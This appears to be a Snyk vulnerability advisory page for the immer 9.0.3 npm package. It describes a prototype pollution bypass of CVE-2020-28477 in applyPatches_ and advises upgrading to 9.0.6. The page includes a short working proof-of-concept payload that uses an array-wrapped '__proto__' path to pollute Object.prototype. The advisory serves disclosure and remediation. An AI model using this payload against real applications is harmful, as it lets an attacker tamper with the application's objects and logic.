immer 9.0.3 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the immer package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
M Prototype Pollution immer is a package that allows you to create your next immutable state by mutating the current one. Affected versions of this package are vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-28477 when the user-provided keys used in the `path` parameter are arrays. In particular, this bypass is possible because the condition `(p === "__proto__" \|\| p === "constructor")` in `applyPatches_` returns `false` if `p` is `['__proto__']` (or `['constructor']`). The `===` operator (strict equality operator) returns `false` if the operands have different type. PoC const {applyPatches, enablePatches} = require("immer"); enablePatches(); // applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]); // applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]); // console.log(polluted); // Error: [Immer] Patching reserved attributes like __proto__, prototype and constructor is not allowed applyPatches({}, [ { op: 'add', path: [['__proto__'], 'polluted'], value: 'yes' } ]); // applyPatches({}, [ { op: 'replace', path: [['__proto__'], 'polluted'], value: 'yes' } ]); console.log(polluted); How to fix Prototype Pollution? Upgrade `immer` to version 9.0.6 or higher.	>=7.0.0 <9.0.6

Vulnerability

Vulnerable Version

Prototype Pollution

immer is a package that allows you to create your next immutable state by mutating the current one.

Affected versions of this package are vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-28477 when the user-provided keys used in the path parameter are arrays. In particular, this bypass is possible because the condition (p === "__proto__" || p === "constructor") in applyPatches_ returns false if p is ['__proto__'] (or ['constructor']). The === operator (strict equality operator) returns false if the operands have different type.

PoC

const {applyPatches, enablePatches} = require("immer");
enablePatches();

// applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]);
// applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]);
// console.log(polluted); // Error: [Immer] Patching reserved attributes like __proto__, prototype and constructor is not allowed

applyPatches({}, [ { op: 'add', path: [['__proto__'], 'polluted'], value: 'yes' } ]);
// applyPatches({}, [ { op: 'replace', path: [['__proto__'], 'polluted'], value: 'yes' } ]);
console.log(polluted);

How to fix Prototype Pollution?

Upgrade immer to version 9.0.6 or higher.

>=7.0.0 <9.0.6

immer@9.0.3 vulnerabilities

Create your next immutable state by mutating the current one

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

PoC